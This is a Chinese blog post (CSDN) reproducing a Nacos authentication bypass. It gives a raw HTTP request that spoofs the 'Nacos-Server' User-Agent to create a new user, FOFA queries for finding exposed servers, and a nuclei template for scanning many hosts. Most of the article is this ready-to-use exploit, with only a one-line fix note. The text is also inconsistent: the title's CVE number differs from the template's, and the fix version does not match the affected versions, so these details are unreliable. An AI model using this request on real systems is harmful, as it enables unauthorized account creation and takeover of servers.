(附nuclei yaml文件)Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现

最新推荐文章于 2024-08-14 15:29:48 发布
最新推荐文章于 2024-08-14 15:29:48 发布
阅读量944 收藏 5
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nglj9527/article/details/139072187
版权

Nacos 身份认证绕过漏洞(CVE-2021-43116)漏洞复现

1、漏洞简介

Nасоѕ是一个专为动态服务发现和配置以及服务管理而设计的平台。在 Nасоѕ 1.4.1 之前的版本中,当配置为使用身份验证(-Dnасоѕ.соrе.аuth.еnаblеd=truе)时,Nасоѕ 使用 AuthFiltеr ѕеrvlеt 过滤器强制执行身份验证。该过滤器有一个后门,使 Nасоѕ 服务器能够绕过该过滤器,从而跳过身份验证检查。此机制依赖于用户代理 HTTP 标头,因此很容易被欺骗。此漏洞可能允许任何用户在 Nасоѕ 服务器上执行任何管理任务。

2、资产指纹

fofa:port=“8848”
app=“NACOS”

3、漏洞复现

POST /nacos/v1/auth/users/?username=sectest05&password=20240520 HTTP/1.1
Host:
User-Agent: Nacos-Server
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 0

使用burpsuite发送数据包绕过认证新增用户
访问http://ip/nacos/#/login使用新增的账号密码进行登录
在这里插入图片描述

4、nuclei脚本

id: nacosCVE-2021-29441

info:
  name: nacos 身份认证绕过
  author: xxx
  severity: high
  description: nacos 身份认证绕过漏洞,可任意新增用户。
  tags: nacos 身份认证绕过漏洞,可任意新增用户。

http:
  - raw:
      - |
        POST /nacos/v1/auth/users/?username=sectest0520&password=20240520 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Nacos-Server
        Content-Length: 0
        Accept-Encoding: gzip

    matchers:     
      - type: dsl
        name: nacos 身份认证绕过
        dsl:
          - "contains(body,'create user ok!') || contains(body,'already exist')"

修复方式

更新到2.2.3版本以上

nglj9527
关注
专栏目录
nacos 的两个源码版本:分别是 nacos-1.4.3 和 nacos-2.0.4
02-25
nacos 是 AliBaBa 为 SpringCLoud 打造的一个组件,用于 注充当注册中心和 配置中心
安全漏洞CVE-2021-41773和CVE-2021-42013漏洞分析
HBohan的博客
10-16 2146
CVE-2021-41773 漏洞成因 Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在…/的路径穿越符,如下所示: while (path[l] != '\0') { if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(p
【备忘录】修复docker环境下的nacos安全漏洞身份认证绕过漏洞
Xcong_Zhu的博客
10-23 2449
nacos2.2.0.1和1.4.5版本之前的版本中,可能是为了便于开发环境使用,默认开启了一个自带的token默认值,导致上述报告中,可以利用默认的访问秘钥跳过认证,直接登陆。1、检查application.properties文件中token.secret.key属性,若为默认值,可参考:https://nacos.io/zh-cn/docs/v2/guide/user/auth.html进行更改。之后讲登录返回包修改为正确登录信息。点击发送发现正确登录返回信息。同时选中base64加密。
针对Nacos漏洞猎杀的各种骚姿势
2301_80115097的博客
08-14 1023
这次给师傅们分析的是Nacos相关漏洞挖掘的骚技巧,主要是给师傅们打下nday,让师傅们能够从零基础的小白也可以上手打Nacos的nday(主要给小白看的,大佬勿喷)。然后下面主要介绍了NacosExploitGUI自动化工具的使用,以及使用这个工具打nday的手法,以及要是批量漏洞url怎么扫描利用,总的来讲,下面的漏洞案例复现还是蛮详细的。
Nacos 身份认证绕过漏洞(已修复)
weixin_58642210的博客
11-14 1344
Nacos 身份认证绕过漏洞
NACOS身份认证绕过漏洞
内心不种满鲜花就会长满杂草
02-24 1万+
目录 漏洞描述 影响版本 docker-compose文件一键搭建漏洞环境 漏洞复现 修复建议 漏洞挖掘 自动化探测脚本POC nacosNacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 漏洞描述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可.
我遇到的Nacos漏洞复现合集
qq_52849046的博客
08-10 1091
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅供学习,切勿用于实战。容易被gangan
NACOS搭建及相关漏洞复现
B_l_a_nk的博客
10-30 1224
身份认证绕过漏洞 (QVD-2023-6271) Nacos权限认证绕过(CVE-2021-29441) 信息泄露
Nacos系统历史CVE漏洞复现分析与检测
道阻且长,行则将至。
02-07 3423
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞
Nacos身份认证绕过漏洞(QVD-2023-6271)
热门推荐
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
Nacos漏洞总结复现
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
nuclei:Nuclei是基于模板的可配置目标漏洞扫描的快速工具,具有大量可扩展性和易用性
03-19
基于简单的基于YAML的DSL的快速且可自定义的漏洞扫描程序。••••••• Nuclei用于基于模板发送跨目标的请求,从而导致零误报并提供对大量主机的快速扫描。 Nuclei提供扫描各种协议的功能,包括TCP,DNS,HTTP,...
nuclei-3.0.1-windows-amd64
06-05
nuclei-3.0.1-windows-amd64】是针对Windows操作系统64位架构的Nuclei工具的版本。Nuclei是一款快速、可配置的、基于模板的安全扫描工具,主要用于网络扫描和渗透测试,以检测目标系统中的已知漏洞。它是由安全...
nuclei-templates:社区策划的用于核引擎的模板列表,以在应用程序中查找安全漏洞
03-10
核模板社区策划了用于原子引擎的模板列表,以在应用程序中发现安全漏洞。 •••• 模板是的核心,它们为实际的扫描引擎提供动力。 该存储库存储和容纳由我们团队提供以及社区贡献的各种扫描仪模板。 我们希望您也...
nuclei-docs:核文件
04-03
Nuclei文档网站的Github项目 nuclei-docs的本地版本安装mkdocs python3 -m pip install mkdocspython3 -m pip install pymdown-extensions>=7.0 --userpython3 -m pip install mkdocs-material-extensions>=1.0 --...
Nuclei RISC-V Linux Softwar,nuclei-linux-sdk-dev-nuclei-next.zip
最新发布
08-19
Nuclei RISC-V Linux Softwar,nuclei-linux-sdk-dev_nuclei_next.zip
Nacos 身份认证绕过漏洞(QVD-2023-6271)
feelxing的专栏
03-31 5661
Nacos 身份认证绕过漏洞(QVD-2023-6271),nacos版本从1.4.1升级到2.2.1最新版本
Nacos身份认证权限绕过+漏洞利用工具分享
hackzkaq的博客
12-27 2892
JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。 在线解密查看内容:
【认证绕过NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6748
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
nuclei yaml
08-16
关于nucleiyaml的问题,根据引用和引用中的内容,nuclei是一个用于执行网络安全扫描的工具,可以通过命令行来使用。而yaml则是一种用于描述数据序列化格式的语言。 在引用中,展示了一个使用nuclei的命令行示例。其中,使用了参数来指定待扫描的目标URL、指定扫描的标签、指定扫描的严重程度、指定扫描的作者,并将扫描结果输出到result.txt文件中。 而在引用中,展示了一个使用nuclei进行调试扫描的命令行示例。其中,使用了参数来指定待扫描的目标URL和使用的模板文件(使用了yaml格式的模板文件)。 综上所述,nuclei是一个可以通过命令行使用的网络安全扫描工具,而yaml则是用于描述数据序列化格式的语言,可以用来编写nuclei的模板文件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [POC模拟攻击利器 —— Nuclei入门(一)](https://blog.csdn.net/liwenxiang629/article/details/125995096)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [Nuclei——一款基于YAML语法模板的快速漏洞扫描工具](https://blog.csdn.net/asaotomo/article/details/122395708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值